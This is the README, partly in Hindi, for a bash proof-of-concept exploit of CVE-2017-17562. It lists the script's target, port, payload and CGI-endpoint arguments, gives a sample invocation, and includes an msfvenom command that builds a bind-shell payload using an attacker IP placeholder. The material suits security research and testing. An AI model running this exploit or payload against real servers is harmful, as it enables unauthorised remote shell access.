
PoC for CVE-2017-17562 written in bash
CVE-2017-17562 के लिए Bash में एक PoC कार्यान्वयन।
HTTP अनुरोध बनाने के लिए curl की आवश्यकता है।
आधारित है Metasploit और @fssecur3 कार्यान्वयन पर।
निम्नलिखित तर्कों को सेट करना आवश्यक है क्योंकि वे टोही और पेलोड भेजने के लिए आवश्यक हैं:
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine
वैकल्पिक रूप से, निम्नलिखित तर्क भी सेट किए जा सकते हैं:
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
वर्तमान कोड केवल सीखने और प्रदर्शन उद्देश्यों के लिए है। आप इसका उपयोग उन लक्ष्यों पर नहीं करेंगे जिनके लिए आपके पास अनुमति नहीं है।
इस रिपॉजिटरी में कोई पेलोड प्रदान नहीं किया गया है। हालांकि कोई भी बाइनरी जो लक्ष्य OS आर्किटेक्चर से मेल खाती है, काम करनी चाहिए। बाइंड शेल पेलोड बनाने के लिए, आप msfvenom का उपयोग कर सकते हैं:
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so